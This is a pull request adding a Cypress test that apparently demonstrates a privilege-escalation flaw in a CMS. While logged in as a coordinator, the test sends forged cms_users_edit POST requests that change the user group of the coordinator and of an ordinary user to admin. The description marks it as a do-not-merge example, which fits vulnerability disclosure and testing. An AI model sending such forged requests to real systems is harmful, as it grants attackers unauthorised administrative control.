### PR TITLE
Working attack that uses coordinator account to change coordinator an…

### DIFF
--- a/cypress/integration/AjaxAttack.js
+++ b/cypress/integration/AjaxAttack.js
@@ -1,0 +1,53 @@
+function AjaxAttack(userMail, userPassword) {
+    cy.request({
+        method: "POST",
+        url: '/?action=cms_users_edit&origin=cms_users&id=100000002',
+        body: {
+            id: "100000001",
+            cms_usergroups_id: "100000002",
+            origin: "cms_users",
+            email: "coordinator@coordinator.co",
+            naam: "BrowserTestUser_Coordinator"
+            
+        },
+        form: true
+    }).then(response => {
+        expect(response.status).to.eq(200);
+        cy.log(response.message);
+        //expect(response.message).to.be.empty;
+        //expect(response.success).to.be.true;
+
+    });
+};
+function AjaxAttack2(userMail, userPassword) {
+    cy.request({
+        method: "POST",
+        url: '/?action=cms_users_edit&origin=cms_users&id=100000002',
+        body: {
+            id: "100000002",
+            cms_usergroups_id: "100000002",
+            origin: "cms_users",
+            email: "user@user.co",
+            naam: "BrowserTestUser_User"          
+        },
+        form: true
+    }).then(response => {
+        expect(response.status).to.eq(200);
+        cy.log(response.message);
+        //expect(response.message).to.be.empty;
+        //expect(response.success).to.be.true;
+
+    });
+};
+
+describe('AttackAjax', () => {
+
+    beforeEach(() => {
+        cy.setupAjaxActionHook();
+        cy.loginAsCoordinator();
+    });
+
+it("Make self admin", ()=>{
+    AjaxAttack();
+    AjaxAttack2();
+})});


### PR DESCRIPTION
Don't merge this. Just an example of how to create manipulated ajax-requests to change credentials, in this case the coordinator account is used to make itself and another ordinary user into admins.